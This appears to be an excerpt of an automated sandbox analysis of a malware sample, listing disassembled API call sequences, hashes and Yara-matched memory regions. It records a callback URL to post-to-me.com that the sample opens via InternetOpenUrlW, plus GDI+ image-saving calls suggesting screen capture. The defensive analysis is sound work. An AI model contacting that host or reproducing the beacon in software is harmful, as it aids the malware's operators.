                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                    • List.LIBCMT ref: 0041AFB4
                                                    • List.LIBCMT ref: 0041AFC3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                    • String ID:
                                                    • API String ID: 3281396844-0
                                                    • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                    • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                    • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                    • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                    APIs
                                                    • _SpinWait.LIBCONCRT ref: 0250B152
                                                      • Part of subcall function 02501188: _SpinWait.LIBCONCRT ref: 025011A0
                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0250B166
                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0250B198
                                                    • List.LIBCMT ref: 0250B21B
                                                    • List.LIBCMT ref: 0250B22A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                    • String ID:
                                                    • API String ID: 3281396844-0
                                                    • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                    • Instruction ID: dfb8b37a76b3d584712507f325da13e6f5c43dba04311e639f0daa0eba10b22e
                                                    • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                    • Instruction Fuzzy Hash: 00314232D00616DFCB14EFA4C9D0AEDBBB2BF84308F04406AC81167681CB31AE04CB99
                                                    APIs
                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                    • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                    • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                    • String ID:
                                                    • API String ID: 2357751836-0
                                                    • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                    • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                    • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                    • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                    APIs
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024F50A3
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024F50B7
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024F511C
                                                    • __Getcoll.LIBCPMT ref: 024F512B
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024F513B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                    • String ID:
                                                    • API String ID: 2395760641-0
                                                    • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                    • Instruction ID: 259cdba1d6b8fa14955a818e7bd4317cc8e01e0c58c1915354542a141ce974bf
                                                    • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                    • Instruction Fuzzy Hash: 78219A72814208AFDB81EFA4C484BDDB7B1FF90715F51800FE585AB281DB749544CF95
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                    • _free.LIBCMT ref: 00431F98
                                                    • _free.LIBCMT ref: 00431FBF
                                                    • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                    • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                    • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                    • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                    • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                    APIs
                                                    • GetLastError.KERNEL32(024FDAD7,024FDAD7,00000002,0251ED35,02523951,00000000,?,02516A05,00000002,00000000,00000000,00000000,?,024FCF88,024FDAD7,00000004), ref: 025221CA
                                                    • _free.LIBCMT ref: 025221FF
                                                    • _free.LIBCMT ref: 02522226
                                                    • SetLastError.KERNEL32(00000000,?,024FDAD7), ref: 02522233
                                                    • SetLastError.KERNEL32(00000000,?,024FDAD7), ref: 0252223C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                    • _free.LIBCMT ref: 00431F11
                                                    • _free.LIBCMT ref: 00431F39
                                                    • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                    • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                    • _free.LIBCMT ref: 02522178
                                                    • _free.LIBCMT ref: 025221A0
                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221AD
                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    APIs
                                                      • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                      • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                      • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                    • String ID:
                                                    • API String ID: 4266703842-0
                                                    APIs
                                                      • Part of subcall function 025029A4: TlsGetValue.KERNEL32(?,?,02500DC2,02502ECF,00000000,?,02500DA0,?,?,?,00000000,?,00000000), ref: 025029AA
                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02507BB1
                                                      • Part of subcall function 0251121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02511241
                                                      • Part of subcall function 0251121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0251125A
                                                      • Part of subcall function 0251121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 025112D0
                                                      • Part of subcall function 0251121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 025112D8
                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02507BBF
                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02507BC9
                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02507BD3
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02507BF1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                    • String ID:
                                                    • API String ID: 4266703842-0
                                                    APIs
                                                    • _free.LIBCMT ref: 00439E5D
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 00439E6F
                                                    • _free.LIBCMT ref: 00439E81
                                                    • _free.LIBCMT ref: 00439E93
                                                    • _free.LIBCMT ref: 00439EA5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    APIs
                                                    • _free.LIBCMT ref: 0252A0C4
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 0252A0D6
                                                    • _free.LIBCMT ref: 0252A0E8
                                                    • _free.LIBCMT ref: 0252A0FA
                                                    • _free.LIBCMT ref: 0252A10C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    APIs
                                                    • _free.LIBCMT ref: 00431748
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 0043175A
                                                    • _free.LIBCMT ref: 0043176D
                                                    • _free.LIBCMT ref: 0043177E
                                                    • _free.LIBCMT ref: 0043178F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    APIs
                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                    • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                    • String ID:
                                                    • API String ID: 2583373041-0
                                                    APIs
                                                    • _free.LIBCMT ref: 025219AF
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 025219C1
                                                    • _free.LIBCMT ref: 025219D4
                                                    • _free.LIBCMT ref: 025219E5
                                                    • _free.LIBCMT ref: 025219F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    APIs
                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0250CF36
                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0250CF67
                                                    • GetCurrentThread.KERNEL32 ref: 0250CF70
                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0250CF83
                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0250CF8C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                    • String ID:
                                                    • API String ID: 2583373041-0
                                                    APIs
                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024F2E8E
                                                      • Part of subcall function 024F1321: _wcslen.LIBCMT ref: 024F1328
                                                      • Part of subcall function 024F1321: _wcslen.LIBCMT ref: 024F1344
                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024F30A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InternetOpen_wcslen
                                                    • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                    • API String ID: 3381584094-4083784958
                                                    APIs
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0251896A
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 02518A23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: fB$csm
                                                    • API String ID: 3480331319-1586063737
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ssB9bjDQPf.exe,00000104), ref: 0042F753
                                                    • _free.LIBCMT ref: 0042F81E
                                                    • _free.LIBCMT ref: 0042F828
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                    • API String ID: 2506810119-472693577
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ssB9bjDQPf.exe,00000104), ref: 0251F9BA
                                                    • _free.LIBCMT ref: 0251FA85
                                                    • _free.LIBCMT ref: 0251FA8F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                    • API String ID: 2506810119-472693577
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024FC8DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8Throw
                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                    • API String ID: 2005118841-1866435925
                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                    • Instruction ID: b39ff94a78c38b6301491a8506224621dd3c4d827cfe64ff5bff1fc0ce9e92dd
                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                    • Instruction Fuzzy Hash: F7F02B72C4060C7ADB84E554CCC1BEB33989B85316F04806BDF42AB182EB689949CBA4
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                    • String ID: F(@
                                                    • API String ID: 3213686812-2698495834
                                                    • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                    • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                    • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                    • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                    • String ID: F(@
                                                    • API String ID: 3213686812-2698495834
                                                    • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                    • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                    • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                    • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                    APIs
                                                    • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                    • String ID: pScheduler
                                                    • API String ID: 1381464787-923244539
                                                    • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                    • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                    • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                    • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                    APIs
                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                    • String ID: pContext
                                                    • API String ID: 1990795212-2046700901
                                                    • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                    • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                    • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                    • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                    • _free.LIBCMT ref: 0042E069
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CloseFreeHandleLibrary_free
                                                    • String ID: B
                                                    • API String ID: 621396759-3071617958
                                                    • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                    • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                    • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                    • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                    APIs
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                    • String ID: pScheduler$version
                                                    • API String ID: 1687795959-3154422776
                                                    • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                    • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                    • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                    • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
